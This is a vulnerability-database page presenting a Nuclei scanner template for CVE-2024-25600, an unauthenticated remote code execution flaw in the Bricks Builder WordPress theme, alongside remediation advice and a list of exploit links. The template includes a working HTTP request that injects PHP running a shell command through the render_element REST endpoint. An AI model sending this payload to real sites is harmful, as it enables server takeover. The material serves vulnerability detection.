| Reporter | Title | Published | Views | Family All 36 |
|---|---|---|---|---|
| Exploit for CVE-2024-25600 | 21 Feb 202400:27 | – | githubexploit | |
| Exploit for CVE-2024-25600 | 31 Mar 202505:44 | – | githubexploit | |
| Exploit for CVE-2024-25600 | 4 Jan 202610:19 | – | githubexploit | |
| Exploit for CVE-2024-25600 | 10 Jul 202512:51 | – | githubexploit | |
| Exploit for CVE-2024-25600 | 28 Nov 202508:25 | – | githubexploit | |
| Exploit for CVE-2024-25600 | 6 Jun 202403:59 | – | githubexploit | |
| Exploit for CVE-2024-25600 | 22 Feb 202410:53 | – | githubexploit | |
| Exploit for CVE-2024-25600 | 20 Feb 202420:16 | – | githubexploit | |
| Exploit for CVE-2024-25600 | 4 Apr 202517:35 | – | githubexploit | |
| Exploit for CVE-2024-25600 | 18 Feb 202617:02 | – | githubexploit |
id: CVE-2024-25600
info:
name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
author: christbowel
severity: critical
description: |
Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
impact: |
Unauthenticated attackers can execute arbitrary code through the Bricks Builder theme, leading to complete site takeover and potential server compromise.
remediation: |
Update Bricks Builder theme to version 1.9.7 or later.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
- https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
- https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
- https://github.com/Chocapikk/CVE-2024-25600
- https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
classification:
epss-score: 0.87452
epss-percentile: 0.99733
metadata:
verified: true
max-request: 2
publicwww-query: "/wp-content/themes/bricks/"
tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce,vkev,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"postId": "1",
"nonce": "{{nonce}}",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "Exception:"
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'nonce":"([0-9a-z]+)'
internal: true
# digest: 4a0a0047304502202b9e808b837b5cb92c18b08541f4a94d241fe245681777f7ae4cfbc5629cb664022100c730f816be77d9b4cf080a9b1b96ae7fed85eba046531476cc2b36fda0a6de06:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation